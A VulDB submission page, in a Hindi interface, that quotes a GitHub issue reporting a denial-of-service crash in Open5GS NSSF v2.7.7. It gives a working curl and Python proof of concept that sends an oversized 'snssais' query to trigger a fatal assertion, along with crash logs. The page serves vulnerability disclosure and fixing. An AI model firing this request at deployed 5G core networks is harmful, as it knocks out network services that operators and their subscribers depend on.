जमा करें #808426: Open5gs NSSF v2.7.7 Denial of Serviceजानकारी

शीर्षक	Open5gs NSSF v2.7.7 Denial of Service
विवरण	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NSSF crashes when the `snssais` query parameter contains more entries than `OGS_MAX_NUM_OF_SLICE`. As with `service-names`, the common SBI request parser processes `snssais` before the request reaches the NSSF-specific `nsselection` handler. The parser eventually calls: ```c ogs_assert(discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE); ``` which turns an oversized `snssais` query into a fatal assertion. ### Steps to reproduce ```bash IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nssf) snssais=$(python3 - <<'PY' import json print(json.dumps([{"sst":1,"sd":f"{i:06x}"} for i in range(20)], separators=(",", ":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i --get \ "http://$IP/nnssf-nsselection/v2/network-slice-information" \ --data-urlencode 'nf-id=test-amf' \ --data-urlencode 'nf-type=AMF' \ --data-urlencode 'slice-info-request-for-pdu-session={"sNssai":{"sst":1,"sd":"000001"},"roamingIndication":"NON_ROAMING"}' \ --data-urlencode "snssais=$snssais" ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nssf docker logs --tail 40 nssf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T17:58:00.189522537Z 04/10 17:58:00.091: [sbi] FATAL: ogs_sbi_discovery_option_add_snssais: Assertion `discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE' failed. (../lib/sbi/message.c:3723) ``` ### Expected behaviour NSSF should reject oversized `snssais` input with a normal HTTP error response. ### Observed Behaviour The connection is reset and the NSSF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
स्रोत	⚠️ https://github.com/open5gs/open5gs/issues/4436
उपयोगकर्ता	LinZiyu (UID 94035)
सबमिशन	20/04/2026 08:16 PM (1 महीना पहले)
संयम	07/05/2026 06:58 PM (17 days later)
स्थिति	स्वीकृत
VulDB प्रविष्टि	361910 [Open5GS तक 2.7.7 NSSF /lib/sbi/message.c ogs_sbi_discovery_option_add_snssais सेवा अस्वीकार]
अंक	20

◂ पिछला सिंहावलोकन अगला ▸

Want to know what is going to be exploited?

We predict KEV entries!